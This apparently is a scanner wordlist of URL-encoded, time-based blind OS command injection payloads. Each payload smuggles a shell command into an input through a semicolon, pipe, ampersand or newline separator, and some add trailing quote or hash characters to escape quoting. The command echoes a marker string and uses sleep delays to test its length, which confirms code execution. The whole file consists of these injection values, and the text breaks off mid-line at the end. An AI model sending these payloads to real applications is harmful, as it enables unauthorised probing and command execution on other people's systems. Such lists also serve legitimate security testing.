n%3B%20str%3D%24%28echo%20APHWVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20APHWVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20APHWVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20APHWVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20APHWVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20APHWVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20APHWVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%7C%20%5B%201%20-ne%20%24%28echo%20AWKJGV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%202%20-ne%20%24%28echo%20AWKJGV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%203%20-ne%20%24%28echo%20AWKJGV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%204%20-ne%20%24%28echo%20AWKJGV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%205%20-ne%20%24%28echo%20AWKJGV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%206%20-ne%20%24%28echo%20AWKJGV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%207%20-ne%20%24%28echo%20AWKJGV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%208%20-ne%20%24%28echo%20AWKJGV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%209%20-ne%20%24%28echo%20AWKJGV%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ITUCTB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ITUCTB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ITUCTB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ITUCTB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ITUCTB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ITUCTB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ITUCTB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ITUCTB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ITUCTB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20UVFUKR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%3B%20str%3D%24%28echo%20WLZIBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20WLZIBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20WLZIBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20WLZIBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20WLZIBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20WLZIBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20WLZIBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20WLZIBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20WLZIBA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%7C%20%5B%201%20-ne%20%24%28echo%20GQZIJB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%202%20-ne%20%24%28echo%20GQZIJB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%203%20-ne%20%24%28echo%20GQZIJB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%204%20-ne%20%24%28echo%20GQZIJB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%205%20-ne%20%24%28echo%20GQZIJB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%206%20-ne%20%24%28echo%20GQZIJB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%207%20-ne%20%24%28echo%20GQZIJB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%208%20-ne%20%24%28echo%20GQZIJB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%7C%20%5B%209%20-ne%20%24%28echo%20GQZIJB%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IFMAPS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%0A%20str%3D%24%28echo%20NNDFMH%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%3B%20str%3D%24%28echo%20TSUCKA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TSUCKA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TSUCKA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TSUCKA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TSUCKA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TSUCKA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TSUCKA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TSUCKA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%3B%20str%3D%24%28echo%20TSUCKA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%7C%20%5B%201%20-ne%20%24%28echo%20CWNAMN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%202%20-ne%20%24%28echo%20CWNAMN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%203%20-ne%20%24%28echo%20CWNAMN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%204%20-ne%20%24%28echo%20CWNAMN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%205%20-ne%20%24%28echo%20CWNAMN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%206%20-ne%20%24%28echo%20CWNAMN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%207%20-ne%20%24%28echo%20CWNAMN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%208%20-ne%20%24%28echo%20CWNAMN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%7C%20%5B%209%20-ne%20%24%28echo%20CWNAMN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20STITDI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20STITDI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20STITDI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20STITDI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20STITDI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20STITDI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20STITDI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20STITDI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20STITDI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%0A%20str%3D%24%28echo%20DPLQYS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%3B%20str%3D%24%28echo%20TWCHKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%7C%20%5B%201%20-ne%20%24%28echo%20IZDFYZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%202%20-ne%20%24%28echo%20IZDFYZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%203%20-ne%20%24%28echo%20IZDFYZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%204%20-ne%20%24%28echo%20IZDFYZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%205%20-ne%20%24%28echo%20IZDFYZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%206%20-ne%20%24%28echo%20IZDFYZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%207%20-ne%20%24%28echo%20IZDFYZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%208%20-ne%20%24%28echo%20IZDFYZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%7C%20%5B%209%20-ne%20%24%28echo%20IZDFYZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GHGVOR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GHGVOR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GHGVOR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GHGVOR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GHGVOR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GHGVOR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GHGVOR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GHGVOR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20GHGVOR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1